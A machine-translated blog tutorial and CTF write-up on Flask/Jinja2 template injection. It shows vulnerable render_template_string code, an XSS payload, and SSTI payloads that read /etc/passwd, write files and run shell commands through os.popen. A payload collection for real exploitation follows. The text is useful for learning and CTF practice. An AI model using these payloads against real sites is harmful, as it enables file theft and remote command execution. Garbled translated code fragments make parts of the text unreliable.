当前位置:网站首页>Flask template injection
Flask template injection
2022-07-19 02:36:00 【jjj34】
Reference link
Learning from scratch flask Template Injection - FreeBuf Network security industry portal
Catalog
The incorrect code is as follows :
2.SSTI File read / Command execution
1. First, determine whether it exists template Inject
2. Explore the available methods
1. Find the following , Prepare for file reading
2. Keep looking , Prepare for command execution
flask Basics
Let's look at a paragraph first python Code
from flask import flask
@app.route('/index/')
def hello_world():
return 'hello world'1.route :
route It's a decorator , The function is to combine the function with url Bind together
The code in the sample is when accessing 127.0.0.1/index/ when ,flask Go back hello world
2. rendering method
flask There are two methods of rendering
1.render_template
render_template() Used to render a specified file , Such as
return render_template('index.html')
2.render_template_string
render_template_string For rendering strings , Such as
html = '<h1> This is index page </h1>'
return render_template_string(html)3. Use of templates
flask It's using jinja2 To be a rendering engine .
Use : Create a new in the root directory of the website templates Folder , For storage html file . That is, the template file
test.py
from flask import Flask,url_for,redirect,render_template,render_template_string
@app.route('/index/')
def user_login():
return render_template('index.html')/templata/index.html
<h1>{
{content}}</h1>This page still outputs This is index page
{ {}} stay Jinja2 As a variable package identifier
Template Injection
reason : Incorrect use of flask Medium render_template_string Method raises SSTI.
1.xss Inject
The incorrect code is as follows :
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)The reason for not being right : code It's user controlled , User pass ?id= That's right code Control , Which in turn affects
<h3>%s</h3> Lead to Inject
When code by </h3> <script>alert(1)</script> <h3> when ,
The executed code becomes
<h3> </h3> <script>alert(1)</script> <h3></h3>
Cause reflex xss Happen
modify
@app.route('/test/')
def test():
code = request.args.get('id')
return render_template_string('<h1>{
{ code }}</h1>',code=code)First the code Convert to string , In this way, the above problems will not occur
Such as , The original sentence is output instead of being taken as JavaScript Language execution
2.SSTI File read / Command execution
Basic knowledge of
stay Jinja2 In the template engine ,{ {}} Is the variable package identifier ,{ {}} Not only variables can be passed , You can also execute some simple expressions , Such as
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)In this code , When the user enters ?id={ {2*4}} when , The following will appear
File read
utilize 40 Templates <type 'file'>,payload as follows :
#1. Get the class object of the string
{
{''.__class__}}
#2. Find the base class
{
{''.__class__.__mro__}}
#3. Look for referential classes
{
{''.__class__.__mro__[2].__subclasses__()}}
# Classes that can be referenced
#{
{''.__class__.__mro__[2].__subclasses__()[40]}} -> <type `file`>
# Utilization mode
{
{''.__class__.__mro__[2].__subclasses__()[40]}('/etc/passwd').read()}Command execution
The template used is 71 <class 'site._Printer'>,payload as follows
{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
listdir yes os The function in , Connection path
Example
In the offensive and defensive world Web_python_template_injection
link : subject (xctf.org.cn)
Ideas : Find the parent class <type ‘object’>–> Find subclasses –> Find modules about command execution or file operation .
solution :
1. First, determine whether it exists template Inject
obviously , The order was executed payload by { {2*4}}
2. Explore the available methods
payload as follows :
{
{''.__class__.__mro__[2].__subclasses__()}}1. Find the following <type 'file'> , Prepare for file reading
Pictured , <type 'file'> It can be used , Subscript to be 40
Add : The serial number is the position of the function , Count from the first , The first is 0
2. Keep looking <class 'site._Printer>, Prepare for command execution
<class 'site.Printer'> Also exist , Serial number for 71
3. obtain flag
First find flag Location
{
{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
Read fl4g file
{
{''.__class__.__mro__[2].__subclasses__()[40]('./fl4g').read()}}
Add
payload collect
// Get the basic class
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object
// Reading documents
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()
// Writing documents
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')
// Execute arbitrary orders
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )Several magic functions
__class__ Returns the object to which the type belongs
__mro__ Returns a tuple containing the base class inherited by the object , Method parses in the order of tuples .
__base__ Returns the base class inherited by the object // __base__ and __mro__ Are used to find base classes
__subclasses__ Each new class retains references to subclasses , This method returns a list of references that are still available in a class
__init__ Class
__globals__ Reference to the dictionary containing the global variables of the function
边栏推荐
猜你喜欢
剑指 Offer 48. 最长不含重复字符的子字符串
Detailed explanation of caduceus project of metauniverse public chain (I): project concept and technical framework of caduceus metaverse protocol
Inverse yuan (I'll add these words if there are too many people using the name)
Metersphere is based on JMeter distributed performance pressure testing platform
SSTI template injection
网络层协议和IP数据包的格式(详解)
After unity imports the FBX model, the rotation and position of the object will change automatically at runtime
剑指 Offer 53 - I. 在排序数组中查找数字 I
怎么将软件的快捷方式添加到鼠标右键的列表中
STL -- deque container
随机推荐
Performance test implementation specification Guide
Attack and defense the world ---- shrink
Unity笔记1
CTFHub----RCE
怎么将软件的快捷方式添加到鼠标右键的列表中
Post man JSON script to JMX script of JMeter
2022.6.28-database-1 Isolation level of database
Network layer transmission protocol (detailed)
Uni app wechat applet ordering system [another order] page Jump
BeanShell脚本获取当前时间
并发虚拟用户、RPS、TPS的解读
[unity panel attribute literacy] set texture import settings after importing textures
VLAN and trunk port configuration
2022最新软件测试工具大全
不会叭不会叭,昨天真有人没写出二进制枚举
[Ruiji takeout ⑩] rough learning of Linux & rough learning of redis
Jstat命令查看jvm的GC情况
3D NFT的破茧重生:Caduceus去中心化边缘渲染技术
SSTI template injection
The jstat command checks the GC status of the JVM